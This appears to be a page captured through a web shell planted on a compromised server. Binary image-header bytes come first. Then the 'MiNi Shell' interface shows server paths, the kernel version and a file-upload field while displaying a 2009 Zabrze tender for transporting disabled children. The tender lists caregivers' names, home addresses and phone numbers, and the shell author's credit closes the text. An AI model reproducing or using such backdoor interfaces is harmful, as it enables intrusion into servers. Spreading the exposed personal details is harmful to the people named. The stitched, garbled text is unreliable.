JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090724/119367-N-2009.html

<p class="kh_header"><b>Zabrze: DOWÓZ DZIECI NIEPEŁNOSPRAWNYCH WRAZ Z OPIEKUNEM DO SZKÓŁ Z ODDZIELNĄ
OBSŁUGĄ  - Z PODZIAŁEM NA TRASY.
Trasa Nr 9, 10, 15, 16, 19, 22</b><br>
<b>Numer ogłoszenia: 119367 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zabrze - Prezydent Miasta , ul. Powstańców Śląskich 5-7, 41-800 Zabrze, woj. śląskie, tel. (032) 3733537, 2710011, faks (032) 3733427, 2710818.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOWÓZ DZIECI NIEPEŁNOSPRAWNYCH WRAZ Z OPIEKUNEM DO SZKÓŁ Z ODDZIELNĄ
OBSŁUGĄ  - Z PODZIAŁEM NA TRASY.
Trasa Nr 9, 10, 15, 16, 19, 22.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przewóz dzieci niepełnosprawnych wraz z opiekunem z miejsca zamieszkania  do szkół.
Zamówienie zostało podzielone na sześć tras:
1. Trasa Nr IX - przewóz dzieci niepełnosprawnych poruszających się na wózkach inwalidzkich wraz z opiekunem do Szkoły Podstawowej Nr 14 przy ul. Gdańskiej 10 w Zabrzu oraz do Zespołu Szkół Specjalnych Nr 41 przy ul. Konopnickiej 3 w Zabrzu.
2. Trasa Nr X - przewóz  dzieci niepełnosprawnych poruszających się na wózkach wraz z opiekunem do Zespołu Szkół Specjalnych Nr 41 przy ul. Konopnickiej 3 w Zabrzu oraz do Zespołu Szkół Ogólnokształcących Nr 12 przy ul. Andersa 64 w Zabrzu.
3. Trasa Nr XV - przewóz  dzieci niepełnosprawnych wraz z opiekunem do Gimnazjum Nr 9 przy ul. Olchowej 2  w Zabrzu oraz do Zespołu Szkół Specjalnych Nr 41 przy ul. Konopnickiej 3 w Zabrzu.  
4. Trasa Nr XVI - przewóz  dzieci niepełnosprawnych poruszających się na wózkach wraz z opiekunem do Szkoły Podstawowej Nr 8 przy ul. Londzina 2 w Zabrzu oraz do Szkoły Podstawowej Nr 14 przy ul. Gdańskiej 10 w Zabrzu oraz do Zespołu Szkół Specjalnych Nr 40 przy ul. Bytomskiej 24 w Zabrzu.
5. Trasa Nr XIX - przewóz  dzieci niepełnosprawnych poruszających się na wózkach inwalidzkich wraz z opiekunem do Przedszkola Nr 48 przy ul. Kotarbińskiego 16 w Zabrzu, Zespołu Szkół Ogólnokształcących Nr 12 przy ul. Andersa 64 w Zabrzu,  Szkoły Podstawowej Nr 42 przy ul. Gagarina 2 w Zabrzu  oraz do Szkoły Podstawowej Nr 14 przy ul. Gdańskiej 10 w Zabrzu.
6. Trasa Nr XXII - przewóz  dzieci niepełnosprawnych wraz z opiekunem do Zespołu Szkolno-Przedszkolnego dla Dzieci Niesłyszących i Słabosłyszących w Katowicach przy ul. Grażyńskiego 17, Szkoły Podstawowej Nr 37 dla Dzieci Niesłyszących i Słabosłyszących w Katowicach przy ul. Lompy 17 oraz do Specjalnego Ośrodka Szkolno - Wychowawczego dla dzieci Słabo Widzących i Niewidomych w Dąbrowie Górniczej - Gołonóg, ul. Wybickiego 1..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zadanie nr 9 - 800 PLN
Zadanie nr 10 - 600 PLN
Zadanie nr 15 - 400 PLN
Zadanie nr 16 - 600 PLN
Zadanie nr 19 - 600 PLN
Zadanie nr 22 - 1 300 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem : spełnia  lub nie spełnia, w oparciu o wymagane dokumenty i zawarte w nich informacje.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty, potwierdzające,  że łącznie spełniają warunki  udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, iż Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp:
A) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert (Załącznik nr 1.1);
B) licencję na wykonywanie krajowego transportu drogowego osób (Załącznik nr 1.2);
C) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego (Załącznik nr 6) oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego (Załącznik nr 7), potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,  wystawione nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert,
D) aktualną  informację z Krajowego Rejestru Karnego,  wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (Załączniki nr 8.(1-n)) potwierdzającą, że osób fizycznych, wspólników spółek jawnych, partnerów lub członków zarządu spółek partnerskich, komplementariuszy spółek komandytowych oraz spółek komandytowo-akcyjnych, urzędujących członków organu zarządzającego osób prawnych - będących Wykonawcą, nie skazano prawomocnie za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową,  przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo, popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
E) aktualną informację Krajowego Rejestru Karnego, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (Załącznik nr 9), potwierdzającą, że podmioty zbiorowe - będące Wykonawcą, nie są podmiotami, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
2.  W celu potwierdzenia, iż Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
A) wykaz zamówień w zakresie świadczenia usług przewozu osób (Załącznik nr 3), a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu,  dat wykonania  i odbiorców oraz dokumenty  potwierdzające, że usługi te zostały wykonane należycie (Załącznik nr 3.(1-n))  o wartości:
dla Trasy Nr IX  -   łącznie co najmniej  38.000,00 PLN
dla Trasy Nr X   -   łącznie co najmniej  31.000,00 PLN 
dla Trasy Nr XV  - łącznie co najmniej   21.000,00 PLN 
dla Trasy Nr XVI  - łącznie co najmniej  28.000,00 PLN
dla Trasy Nr XIX  - łącznie co najmniej  28.000,00 PLN
dla Trasy Nr XXII  - łącznie co najmniej  66.000,00 PLN
Warunek dotyczący doświadczenia Wykonawcy  nie podlega sumowaniu dla tras numer IX, X, XV, XVI, XIX, XXII  tzn. spełnienie warunku wyższego jest równoznaczne ze spełnieniem warunku niższego - wymagania ilościowe i jakościowe można traktować łącznie dla każdej trasy.
B) wykaz pojazdów przeznaczonych do wykonania zamówienia (Załącznik nr 5):
- na Trasę Nr IX pojazd z liczbą miejsc siedzących dla minimum 13 osób (łącznie   z kierowcą); w tym 3 siedzenia wyposażone w pasy bezpieczeństwa; nisko usytuowane wejście do pojazdu, pojazd wyposażony w windę, podnośnik lub podjazd, miejsce do bezpiecznego przewiezienia 2 składanych wózków inwalidzkich oraz 4 wózków nieskładanych przewożonych z dziećmi;
- na Trasę Nr X pojazd z liczbą miejsc siedzących dla minimum 13 osób (łącznie z kierowcą); w tym 3 siedzenia wyposażone w pasy bezpieczeństwa; nisko usytuowane wejście do pojazdu, pojazd wyposażony w windę, podnośnik lub podjazd, miejsce do bezpiecznego przewiezienia 2 składanych wózków inwalidzkich oraz 1 wózek nieskładany przewożony z dzieckiem;
- na Trasę Nr XV pojazd z liczbą miejsc siedzących dla minimum 10 osób (łącznie z kierowcą); 
- na Trasę Nr XVI pojazd z liczbą miejsc siedzących dla minimum 12 osób (łącznie      z kierowcą) w tym 2 siedzenia wyposażone w pasy bezpieczeństwa, nisko usytuowane wejście do pojazdu, pojazd wyposażony w windę, podnośnik lub podjazd, miejsce do bezpiecznego przewiezienia 1 wózka nieskładanego przewożonego wraz z dzieckiem; 
- na Trasę Nr XIX pojazd z liczbą miejsc siedzących dla minimum 10 osób (łącznie z kierowcą), w tym 3 siedzenia wyposażone w pasy bezpieczeństwa, nisko usytuowane wejście do pojazdu, pojazd wyposażony w windę, podnośnik lub podjazd, miejsce do bezpiecznego przewiezienia 2 składanych wózków inwalidzkich, 1 wózka nieskładanego oraz 2 wózków nieskładanych przewożonych wraz z dziećmi;
- na Trasę Nr XXII pojazd z liczbą miejsc siedzących dla minimum 10 osób (łącznie     z kierowcą); 
Warunek dotyczący potencjału technicznego nie podlega sumowaniu dla trasy 
Nr IX,X,XV,XVI,XIX,XXII tzn. wymagania ilościowe i jakościowe należy traktować oddzielnie dla każdej trasy. Zamawiający wymaga, aby dla każdej trasy Wykonawca podał różne pojazdy do przewozu dzieci, tzn. pojazd do przewozu dzieci na wybranej przez Wykonawcę trasie nie może obsługiwać więcej niż jednej trasy.
C) pisemne zobowiązanie innych podmiotów do udostępnienia pojazdów przeznaczonych do wykonania zamówienia, jeśli w wykazie o którym mowa w pkt B) wykonawca wskazał pojazd nie będący jego własnością, którym będzie dysponował w trakcie realizacji zamówienia (Załącznik nr 5. 1-n),
D) wykaz proponowanych osób do pełnienia funkcji opiekuna/opiekunów (Załącznik nr 4), które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat zakresu wykonywanych przez nich czynności zatrudnione przez Wykonawcę. 
Wymagane jest aby były to wyłącznie osoby wymienione w poniższym zestawieniu zbiorczym 
a wyznaczone przez dyrektorów szkół i placówek oświatowych miasta Zabrze. 
Imię i nazwisko  Adres zamieszkania Numer telefonu	Miejsce  zatrudnienia
1.	Renata Sobczak	Zabrze, ul. Żeromskiego 69/9	502- 538- 775	P-34
2.	Joanna Zdziech	Zabrze, ul. 3 Maja 45/9	669-955-255	P-34
3.	Anna- Maria Koc	Zabrze, ul. Wolności 301/1	503-026-486	ZSS-39
4.	Beata Kocyba	Zabrze, ul. Andersa 11/4	032 272-04-18
                                                                           694-555-126	ZSS-39
5.	Anna Mroczkowska	Zabrze, ul. Dzierżonia 33/15	032 275-76-72
                                                                                504-174-738 	ZSS-39
6.	Bożena Drej	Zabrze, ul. Zakątek 1/10	601-635-221	ZSS-41
7.	Katarzyna Tenerowicz	Zabrze, ul. Hermisza 4/32	692-430-860	SP-14
8.	Monika Demczuk	Zabrze, ul. Reja 10/1 	785-475-086	SP-14
9.	Ewa Jurewicz	Zabrze, ul. Makuszyńskiego 16	508-835-769
                                                                                032 272-27-80	ZSS-41
10.	Urszula Miemiec	Zabrze, ul. Korczoka 59 B/2	506-056-182 032-277-06-13    język migowy	ZSS-42
11.	Dorota Zbraniborska	Zabrze ul. PL. Krakowski 8/9	606 934 826	P-34

Dla Trasy Nr XXII opiekunem musi być osoba posługująca się językiem migowym.
Zamawiający wymaga aby Wykonawca uzyskał zgodę osoby wyznaczonej do pełnienia funkcji opiekuna na podjęcie zatrudnienia przy obsłudze wyłącznie jednej z tras Nr IX,X, XV, XVI, XIX, XXII. Uzyskana od opiekuna zgoda powinna wykluczać możliwość podjęcia przez niego zatrudnienia na innej trasie.
Warunek dotyczący potencjału kadrowego nie podlega sumowaniu dla tras Nr IX, X, XV, XVI, XIX, XXII tzn. wymagania ilościowe należy traktować oddzielnie dla każdej trasy. Zamawiający wymaga, aby osoba wyznaczona do pełnienie funkcji opiekuna nie mogła obsługiwać więcej niż jednej trasy. 
3. W celu potwierdzenia, iż Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
A)	sprawozdanie finansowe: rachunek zysków i strat  - Załącznik nr 2.(1-n), a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości  również z opinią odpowiednio o badanym sprawozdaniu (Załącznik 2.(1-n).a - a w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, inny dokument określający obroty  oraz zobowiązania  i należności (Załącznik nr 2)  za okres nie dłuższy niż ostatnie 3 lata  obrotowe, a  jeżeli okres prowadzenia działalności jest krótszy - za ten  okres. Zamawiający wymaga, aby średni roczny obrót Wykonawcy rozumiany jako przychód ze sprzedaży za ostanie 3 lata obrotowe, a  jeżeli okres prowadzenia działalności jest krótszy - za ten  okres wynosił nie mniej niż:
dla Trasy Nr IX  -   łącznie co najmniej  38.000,00 PLN
dla Trasy Nr X   -   łącznie co najmniej  31.000,00 PLN 
dla Trasy Nr XV  - łącznie co najmniej   21.000,00 PLN 
dla Trasy Nr XVI  - łącznie co najmniej  28.000,00 PLN
dla Trasy Nr XIX  - łącznie co najmniej  28.000,00 PLN
dla Trasy Nr XXII  - łącznie co najmniej  66.000,00 PLN
Warunek dotyczący sytuacji finansowej Wykonawcy nie podlega sumowaniu dla tras Nr IX, X, XV, XVI, XIX, XXII tzn. spełnienie warunku wyższego jest równoznaczne ze spełnieniem warunku niższego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zabrze.magistrat.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Oświaty 
Urząd Miejski w Zabrzu
ul. Park Hutniczy 8
pok.8
Zabrze.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2009 godzina 10:30, miejsce: Biuro Zamówień Publicznych
Urząd Miejski w Zabrzu
ul. Wolności 286
pok.305.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trasa nr IX.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przewóz dzieci niepełnosprawnych poruszających się na wózkach inwalidzkich wraz z opiekunem do Szkoły Podstawowej Nr 14 przy ul. Gdańskiej 10 w Zabrzu oraz do Zespołu Szkół Specjalnych Nr 41 przy ul. Konopnickiej 3 w Zabrzu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trasa nr X.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przewóz  dzieci niepełnosprawnych poruszających się na wózkach wraz z opiekunem     do Zespołu Szkół Specjalnych Nr 41 przy ul. Konopnickiej 3 w Zabrzu oraz do Zespołu Szkół Ogólnokształcących Nr 12 przy ul. Andersa 64 w Zabrzu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Trasa nr XV.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przewóz  dzieci niepełnosprawnych wraz z opiekunem do Gimnazjum Nr 9                     przy ul. Olchowej 2  w Zabrzu oraz do Zespołu Szkół Specjalnych Nr 41 przy ul. Konopnickiej 3 w Zabrzu.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Trasa nr XVI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przewóz  dzieci niepełnosprawnych poruszających się na wózkach wraz z opiekunem      do Szkoły Podstawowej Nr 8 przy ul. Londzina 2 w Zabrzu oraz do Szkoły Podstawowej Nr 14 przy ul. Gdańskiej 10 w Zabrzu oraz do Zespołu Szkół Specjalnych Nr 40 przy ul. Bytomskiej 24 w Zabrzu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.16.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Trasa nr XIX.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przewóz  dzieci niepełnosprawnych poruszających się na wózkach inwalidzkich             wraz z opiekunem do Przedszkola Nr 48 przy ul. Kotarbińskiego 16 w Zabrzu, Zespołu Szkół Ogólnokształcących Nr 12 przy ul. Andersa 64 w Zabrzu,  Szkoły Podstawowej Nr 42 przy ul. Gagarina 2 w Zabrzu  oraz do Szkoły Podstawowej Nr 14 przy ul. Gdańskiej 10 w Zabrzu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Trasa nr XXII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przewóz  dzieci niepełnosprawnych wraz z opiekunem do Zespołu Szkolno-Przedszkolnego dla Dzieci Niesłyszących i Słabosłyszących w Katowicach przy ul. Grażyńskiego 17, Szkoły Podstawowej Nr 37 dla Dzieci Niesłyszących i Słabosłyszących w Katowicach przy ul. Lompy 17 oraz do Specjalnego Ośrodka Szkolno - Wychowawczego dla dzieci Słabo Widzących i Niewidomych w Dąbrowie Górniczej - Gołonóg, ul. Wybickiego 1..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com